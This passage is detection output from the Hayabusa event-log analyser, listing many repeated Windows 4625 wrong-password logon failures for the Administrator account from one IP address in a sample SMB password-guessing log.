Fe9xMOoCxPJIIyVq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.246 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DW3YgBZYiGTeEw66 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.293 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VAKeeIcOeiQ3H9NF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.338 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmF3ot3gJCsBlSwF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.395 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wDjoResfZvvVqqE5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.437 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V4dwzMwvVtzztGwr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.491 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0qklApBFOMxVzucD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.538 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0IJSphtLB3eNARBo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.582 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PLOFe4w5KpJ2UaGM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.620 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cF3JTWkGadY1fJE2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.666 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kyTH0jxSZB2YVdhW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.709 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NRq5XrcDkFvabCzh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.750 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zlYwlgrsMy1kSgEC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.790 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AchwW4ifbZ41AQNg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1PaxF7Q8ue1Kex1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WAhW2PErXdwNVrx5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:11.943 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LoAV3ESqieev2JMC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.012 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wFlWFijaFirgsAtJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.049 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hSDjuqvzKLaWCWVo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.109 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SL0CVu787iFRLiPU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.219 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZQDORN33izpv4tGO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.253 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v470yorD43fgGyjC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.305 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LBbLWVZFDqFxb7dW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.360 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RJsowt9MrhXciLOZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.404 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uhCVFyMmDI5shASV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.452 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yd4SM9EGM7cnO6Z5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.490 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PSR1tbtzdDaJDbXs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.538 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rNqyjBuN0Pq6WRO1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.585 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vqpMAmE9OvHbFCh2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.632 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JfLQAaB0DPvxWQMB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.676 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: A0kvHMwnj2k0HMLQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.712 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kPqfVDftcR4iRDaw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.748 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1bltwm2g13InAJM6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.788 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J2iFr8ppe5NzukXF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.842 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7EEUOBohBFRze6hL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.887 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NCOFn3WM71KmaZyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UdUkBxB1auduRfdS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:12.980 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E2JaWoYK56HRGfW1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.015 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: a3JTCX9NIOpg6TFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.064 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zFGkdUVAdKcrrREB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.108 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7oZW00FpKema01Vw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.151 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p4HbNQx0Acf83b1h | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aM5UCQbOLvcpI0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.238 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BGGChEAIdej9lBhr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4CaFYB1ImWAWbH0W | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.320 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OLa3lkxWiJ00raQh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vMzyi0jIVLNrodC8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.409 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2repX0roAP2j0TI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.460 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gqcpIjdkNpmoTe4A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.488 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Edgo9UdNvmMJpiyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.532 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LpqOTu7Xn7ULipmN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.567 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TP0efL79STMbuu9g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.610 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HkwWfRi0E5sVY6UT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IkyCe9NXGExCQS5r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.698 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IGnhRwa7P7by9vJO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.740 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fh7IGliNbSyKwxpM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.782 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1QfgWsAqSYQfB9l5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.821 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q8VM66P8Vluf7yrL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.861 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cdYiwh3QjdA0Zoge | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.904 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ou3FPUI5bFcUvuFC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.952 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bMUg8N7apFtUgX9d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:13.991 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U7Cn4n7jQAQaxP6y | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.024 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urflPvd1vgYYi2ra | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pqFtTDD69fNTKROG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.113 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: teUZYpNyqJ64Dgcz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.152 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9kaKSy3DV5fRKvTc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.196 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gtiZUzpwrnuWIjna | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.238 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SD9UhsShNJRp251r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5xbL7aO0azgBxfz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.342 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xqrUpW8PpI9RAeGk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.452 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: M80K04eYwfwdzIul | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.497 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jcWY7cNeCNgJ3Czr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.544 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1OA561UrTkFnbEj3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.580 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iDnu1G7jmwLoXGLF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.624 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: e2v70poTOKPUNZJo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.673 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EhzoOmgTrdvTS27z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.724 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pyvmBFGhKFgvzM9S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.772 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHC0keHW2YsKeP02 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:52:14.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator 